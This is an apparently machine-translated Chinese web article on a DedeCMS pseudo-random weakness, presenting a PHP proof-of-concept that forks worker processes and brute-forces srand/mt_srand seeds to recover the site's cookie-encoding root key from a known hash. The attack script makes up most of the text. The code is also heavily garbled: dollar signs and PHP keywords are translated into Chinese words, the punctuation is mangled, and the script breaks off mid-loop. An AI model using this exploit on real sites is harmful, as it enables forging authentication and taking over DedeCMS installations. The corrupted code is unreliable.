本篇文章为大家展示了DEDECMS伪随机漏洞分析之如何获取根键,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。
1。用户主页
1.1限制条件(中)
要求开启会员功能
1.2代码分析
//请填写下面的信息
CPU=8美元;//cpu: cpu核数,cpu对美元应到开启的进程的数量,不宜过高
attack_method=2美元;//碰撞类型:如果是用户主页就是1,自定义表单就是2
$ attack_param=啊?,//数据:选择1填写uid,选择2填写dede_fields
$ attack_hash=啊?//散列:才能填写哈希
max_美元=4294967296;
$ targets_=[],
$ the_1=(int) (max_/cpu)美元;
the_2=美元max_ % $ cpu;
($ i=0;美元我& lt;cpu美元;$我+ +){
,,,, array_push (targets_美元,(($ i) * the_1美元($ i + 1) * $ the_1]);
}
$字符=& # 39;abcdefghigklmnopqrstuvwxwyABCDEFGHIGKLMNOPQRSTUVWXWY0123456789& # 39;;
max=61美元;//strlen($字符)- 1;
$ already_test=0;
($ i=0;美元我& lt;cpu美元;$我+ +){
,,,, $ pid=pcntl_fork ();
,,,,如果($ pid==1) {
,,,,,,,,死(“不能fork");
,,,,} elseif ($ pid) {
,,,,,,,,,
,,,,,,,,//echo $ pid;
,,,,,,,,//回应“我# 39;m父我\ n"美元;
,,,,}其他{
,,,,,,,,//var_dump ($ targets_ [$ i] [0]);
,,,,,,,, the_poc (targets_美元[$ i][0],美元targets_ [$ i][1],我美元);
,,,,,,,,退出;
,,,,}
}
函数the_poc(开始,结束,美元$ id) {
,,,,全球美元识字课;
,,,,全球美元max;
,,,,全球attack_method美元;
,,,,全球attack_param美元;
,,,,全球attack_hash美元;
,,,, $ the_whole=(int)((结束-开始美元)/1000000),
,,,,美元i_do=0;
,,,, (y=美元开始;美元y<=$结束;$ y + +) {
,,,,,,,,如果((i_do % 1000000美元)==1){
,,,,,,,,,,,,,,,,呼应“$ id已完成(x1000000):“;
,,,,,,,,,,,,,,,,回声(int) (i_do/1000000美元);
,,,,,,,,,,,,,,,,呼应“/$ the_whole \ n";
,,,,,,,,}
,,,,,,,, i_do=i_do + 1美元;
,,,,,,,,将srand ($ y);
,,,,,,,,美元长度=兰德(28日32);
,,,,,,,, mt_srand ($ y);
,,,,,,,, $ rnd_cookieEncode=& # 39; & # 39;;
,,,,,,,, ($ i=0;美元我& lt;美元的长度;null
